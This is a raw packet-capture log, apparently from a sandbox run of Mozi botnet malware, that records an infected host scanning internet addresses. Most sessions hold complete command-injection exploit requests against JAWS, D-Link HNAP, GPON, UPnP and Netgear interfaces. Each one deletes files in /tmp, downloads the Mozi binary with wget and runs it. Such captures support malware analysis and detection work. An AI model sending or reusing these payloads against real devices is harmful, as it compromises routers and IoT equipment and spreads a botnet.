                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  1 | 192.168.2.20 | 48066 | 175.203.81.2 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:35:45.030977964 CET | 241 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 175.203.81.2:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:35:45.311620951 CET | 242 | IN | HTTP/1.1 302 Found
                                                                                                                  Location: http://175.203.81.2:80:8899
                                                                                                                  Content-Length: 0
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:44 GMT
                                                                                                                  Server: httpd


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  10 | 192.168.2.20 | 58988 | 13.89.231.175 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:47.954700947 CET | 553 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 13.89.231.175:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:36:48.112098932 CET | 556 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:47 GMT
                                                                                                                  Content-Length: 1245
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailab


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  11 | 192.168.2.20 | 36372 | 113.161.185.44 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:48.014179945 CET | 554 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 113.161.185.44:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                  Feb 6, 2021 11:36:48.232862949 CET | 557 | IN | HTTP/1.0 302 Found
                                                                                                                  Pragma: no-cache
                                                                                                                  Location: https://113.161.185.44:443/HNAP1/
                                                                                                                  Content-type: text/html
                                                                                                                  Data Ascii: <html> <head> <title>302 Document moved</title> </head><body>This document has moved <A HREF="https://113.161.185.44:443/HNAP1/">here</A>.<P></body></html>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  12 | 192.168.2.20 | 57414 | 41.57.99.92 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:54.947834969 CET | 590 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                  Feb 6, 2021 11:36:55.159195900 CET | 590 | IN | HTTP/1.1 501 Not Implemented
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Length: 121
                                                                                                                  Date: Sat, 06 Feb 2021 10:36:52 GMT
                                                                                                                  Expires: 0
                                                                                                                  Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  13 | 192.168.2.20 | 56274 | 176.116.205.200 | 52869
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:55.819859028 CET | 599 | OUT | POST /picsdesc.xml HTTP/1.1
                                                                                                                  Content-Length: 630
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                                  Accept: /
                                                                                                                  User-Agent: Hello-World
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                                  Feb 6, 2021 11:36:55.887101889 CET | 600 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                  CONTENT-LENGTH: 451
                                                                                                                  CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                                  DATE: Sat, 01 Jan 2000 00:21:12 GMT
                                                                                                                  EXT:
                                                                                                                  SERVER: Linux/2.6.21.5, UPnP/1.0, Portable SDK for UPnP devices/1.6.6
                                                                                                                  X-User-Agent: redsonic
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  14 | 192.168.2.20 | 43404 | 170.135.128.1 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:36:57.954531908 CET | 611 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Feb 6, 2021 11:36:58.425070047 CET | 612 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Feb 6, 2021 11:36:59.369103909 CET | 615 | OUT | POST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                  Host: 127.0.0.1:80
                                                                                                                  Connection: keep-alive
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Content-Length: 118
                                                                                                                  Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port
15 | 192.168.2.20 | 48524 | 193.248.153.76 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:37:01.979513884 CET | 626 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 193.248.153.76:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port
16 | 192.168.2.20 | 45556 | 72.200.237.136 | 49152
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:37:02.283832073 CET | 628 | OUT | POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                                                                  Host: 72.200.237.136:49152
                                                                                                                  Content-Length: 630
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
Feb 6, 2021 11:37:02.489744902 CET | 629 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                  CONTENT-LENGTH: 412
                                                                                                                  CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                                  DATE: Sat, 06 Feb 2021 10:36:58 GMT
                                                                                                                  EXT:
                                                                                                                  SERVER: Linux/2.6.39.3, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
                                                                                                                  X-User-Agent: redsonic
                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


Session ID | Source IP | Source Port | Destination IP | Destination Port
17 | 192.168.2.20 | 55086 | 74.79.213.38 | 80
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:37:16.898340940 CET | 702 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 74.79.213.38:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
Feb 6, 2021 11:37:17.053585052 CET | 704 | IN | HTTP/1.1 404 Not Found
                                                                                                                  X-FRAME-OPTIONS: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Set-Cookie: JSESSIONID=3A702A1A2E0723FAF83AC332C5FFF456; Path=/; HttpOnly
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                  Content-Length: 993
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:16 GMT
                                                                                                                  Server: CJServer/1.1
                                                                                                                  Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=2.0"/><meta name="format-detection" content="telephone=no"><STYLE>html {}</STYLE><HTML><head><meta name="cjpage" content="ErrorServlet"/><LINK ID="ctrlStyles" REL=STYLESHEET TYPE="text/css" HREF="/_common/lvl5/includes/properties_controlstyles_css.jsp"></head><BODY><SCRIPT LANGUAGE="JavaScript">if(top.revealActionPane){ top.revealActionPane();} var clipboardText ="";</SCRIPT><DIV ID="cjOuter" style="padding:10px"><TABLE WIDTH=100% HEIGHT=100%><TR><TD style="vertical-align:top;"<DIV ALIGN="CENTER" style="vertical-align:top;"><div class="stdTitle">Error</div></DIV><BR><DIV class="normHeader">The application is unable to service your request due to: [404 - a document missing at the specified URI] While attempting to access URI: [/shell]</DIV></TD></TR></TABLE></DIV></SCRIPT></BODY><


Session ID | Source IP | Source Port | Destination IPDestination Port
18 | 192.168.2.20 | 40316 | 156.225.150.18380
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:37:23.057007074 CET | 733 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Feb 6, 2021 11:37:23.686255932 CET | 733 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Feb 6, 2021 11:37:23.969428062 CET | 742 | IN | HTTP/1.1 403 Forbidden
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                  Access-Control-Allow-Methods: GET, POST
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:19 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 1157
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>403 - : </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container">


Session ID | Source IP | Source Port | Destination IP | Destination Port
19 | 192.168.2.20 | 39288 | 190.189.194.46 | 49152
Timestamp | kBytes transferred | Direction | Data
Feb 6, 2021 11:37:33.073523998 CET | 785 | OUT | POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                                                                  Host: 190.189.194.46:49152
                                                                                                                  Content-Length: 630
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Hello, World
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
                                                                                                                  Feb 6, 2021 11:37:33.380716085 CET | 786 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                  CONTENT-LENGTH: 412
                                                                                                                  CONTENT-TYPE: text/xml; charset="utf-8"
                                                                                                                  DATE: Sat, 06 Feb 2021 10:37:31 GMT
                                                                                                                  EXT:
                                                                                                                  SERVER: Linux/2.6.39.3, UPnP/1.0, Portable SDK for UPnP devices/1.6.18
                                                                                                                  X-User-Agent: redsonic
                                                                                                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><s:Fault><faultcode>s:Client</faultcode><faultstring>UPnPError</faultstring><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0"><errorCode>401</errorCode><errorDescription>Invalid Action</errorDescription></UPnPError></detail></s:Fault></s:Body></s:Envelope>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  2 | 192.168.2.20 | 42806 | 144.76.43.37 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:35:52.068749905 CET | 283 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 144.76.43.37:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                  Feb 6, 2021 11:35:52.140109062 CET | 283 | IN | HTTP/1.0 404 Not Found
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Sat, 06 Feb 2021 10:35:52 GMT
                                                                                                                  Content-Length: 19
                                                                                                                  Data Ascii: 404 page not found


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  20 | 192.168.2.20 | 32776 | 23.236.242.26 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:37:36.986741066 CET | 800 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 23.236.242.26:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:37:37.184235096 CET | 802 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Server: Microsoft-IIS/8.5
                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:38 GMT
                                                                                                                  Content-Length: 1163
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  21 | 192.168.2.20 | 54454 | 23.12.191.118 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:37:44.021265030 CET | 835 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 23.12.191.118:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive
                                                                                                                  Feb 6, 2021 11:37:44.289354086 CET | 836 | IN | HTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 209
                                                                                                                  Expires: Sat, 06 Feb 2021 10:37:44 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:44 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;d6c97bc8&#46;1612607864&#46;2c4ae993</BODY></HTML>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  22 | 192.168.2.20 | 59832 | 23.53.160.36 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:37:51.033628941 CET | 870 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:37:51.310208082 CET | 870 | IN | HTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 208
                                                                                                                  Expires: Sat, 06 Feb 2021 10:37:51 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:37:51 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;bb003d17&#46;1612607871&#46;ec61bc6</BODY></HTML>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  23 | 192.168.2.20 | 39748 | 2.22.143.222 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:38:28.846885920 CET | 1053 | OUT | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                  Feb 6, 2021 11:38:28.901905060 CET | 1053 | IN | HTTP/1.0 400 Bad Request
                                                                                                                  Server: AkamaiGHost
                                                                                                                  Mime-Version: 1.0
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 209
                                                                                                                  Expires: Sat, 06 Feb 2021 10:38:28 GMT
                                                                                                                  Date: Sat, 06 Feb 2021 10:38:28 GMT
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;3cd21102&#46;1612607908&#46;1097dbb2</BODY></HTML>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  24 | 192.168.2.20 | 33236 | 180.254.107.55 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:38:32.964672089 CET | 1069 | OUT | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                  User-Agent: Hello, world
                                                                                                                  Host: 180.254.107.55:80
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                  Connection: keep-alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  25 | 192.168.2.20 | 55722 | 34.66.226.190 | 80
                                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                                  Feb 6, 2021 11:38:38.902142048 CET | 1096 | OUT | POST /HNAP1/ HTTP/1.0
                                                                                                                  Host: 34.66.226.190:80
                                                                                                                  Content-Type: text/xml; charset="utf-8"
                                                                                                                  SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                  Content-Length: 640
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                  Feb 6, 2021 11:38:49.783454895 CET | 1150 | IN | HTTP/1.1 400 Bad Request
                                                                                                                  Date: Sat, 06 Feb 2021 10:38:38 GMT
                                                                                                                  Server: Apache/2.4.25 (Debian)
                                                                                                                  Content-Length: 305
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at 34.66.226.190 Port 80</address></body></html>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  26 | 192.168.2.20 | 49434 | 104.149.254.177 | 80
